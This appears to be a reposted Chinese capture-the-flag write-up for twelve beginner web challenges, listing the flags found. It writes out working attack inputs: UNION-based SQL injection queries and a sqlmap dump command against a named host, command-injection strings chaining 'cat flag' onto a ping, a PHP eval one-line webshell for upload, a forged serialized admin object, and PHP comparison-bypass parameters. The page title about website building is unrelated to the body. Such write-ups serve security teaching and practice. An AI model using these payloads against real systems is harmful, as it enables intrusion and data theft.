企石网站建设公司制作网页一般需要兼容哪些网站
news/
2025/9/30 20:51:02/
文章来源:
企石网站建设公司,制作网页一般需要兼容哪些网站,北京本地网络推广平台,网站建设服务中心目录
1、F12
2、robots
3、game1-喂青蛙
4、game 2 - flap bird
5、game 3 - Clash
6、GetPost
7、sql
#xff08;1#xff09;手工注入
#xff08;2#xff09;工具注入
8、命令执行漏洞
9、文件上传漏洞
10、文件泄露
11、php反序列化漏洞
12、PHP绕…目录
1、F12
2、robots
3、game1-喂青蛙
4、game 2 - flap bird
5、game 3 - Clash
6、GetPost
7、sql
1手工注入
2工具注入
8、命令执行漏洞
9、文件上传漏洞
10、文件泄露
11、php反序列化漏洞
12、PHP绕过 1、F12
根据题目提示直接F12看源代码在注释里找到flag flag{s0_eaSyest_wEb_fl2}
2、robots 直接访问robots.txt
得到 继续访问Myon.php
拿到flag flag{oH_My_bOy_You_fiNd_mE!}
3、game1-喂青蛙
找到输出flag的判断条件直接改为if(1)CtrlS保存开始等待时间结束即可
或者自己打到66或56分也会得到flag也可以改成自己希望输出flag的分数再打到对应分数即可 flag{b928e21ad8b3ab6698e3c273e39eda5b}
4、game 2 - flap bird 随便玩玩就出flag flag{9c5046d299ac704475bcd7d6c56c9519}
5、game 3 - Clash
打爆中间的boss就出flag flag{16da83e9da66fcd097c1032aa2f6ca3b}
6、GetPost
简单的get和post传参根据要求传入对应内容即可 flag{welcome-to-ctf-enjoy}
7、sql
简单的SQL注入 1手工注入
使用order by判断一下字段数
试到3的时候后报错说明有两列 查数据库名
union select 1,database()
发现数据库名为test 查该数据库下的所有表名
union select 1,table_name from information_schema.tables where table_schematest
发现该数据库下有一个名为flag的表 直接在该表下尝试查询关键字flag
union select 1,flag from flag
拿到flag snert{9c565f3584a8e7ad64a73996b615811b}
2工具注入
由于这里不存在任何过滤和绕过使用sqlmap跑一下只需要提供注入点是id直接得flag
sqlmap -u http://snert.vip:8079/?id1 --dump 8、命令执行漏洞
随便ping一个ip之后发现ping命令被执行了 我们在ip后使用进行连接后面接其他想要执行的命令
127.0.0.1ls 可以看到存在flag直接cat flag
127.0.0.1cat flag flag{Myon_myon_my}
9、文件上传漏洞
很明显的文件上传并且这里不存在任何绕过 直接上传一句话木马
?php eval($_POST[cmd]);?
根据题目提示文件会被传到uploads目录下 使用蚁剑尝试连接 找到flag flag{just_easy_wjsc}
10、文件泄露 根据题目提示扫描一下目录 发现存在robots.txt 访问之后发现另一个文件地址 /wzym123.zip
直接访问该地址将文件下载下来 经过寻找最终在sqqyw.sql下找到flag flag{!#$kobi123}
11、php反序列化漏洞 简单审计一下PHP代码这里需要给参数data传入序列化的user对象
原本 $isAdmin false
输出flag的判断条件
if ($user-isAdmin) {
echo Welcome, admin!; include(flag.php); echo $flag;
判断use是不是admin其实就是调用user这个类下的参数isAdmin 只需要将isAdmin改为true再将整个类进行序列化传给data即可
php代码
?php
class User {public $username;public $isAdmin true;
}$u new User();
echo serialize($u);
? 使用get方法给data传入序列化后的内容
payloadO:4:User:2:{s:8:username;N;s:7:isAdmin;b:1;} 回显flag
flag{its_an_1Z_PHP_unserialize}
12、PHP绕过 就是一些对PHP常见特性和函数的绕过
这里payload有很多我只给出一个示例
payload
?myon1[]1myon2[]2
myon3[]3myon4[]4swust[]1hacker1e10lover0 关于这些PHP特性绕过的详细讲解可以参考我另一篇博客
http://t.csdnimg.cn/VjNB7
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/923237.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!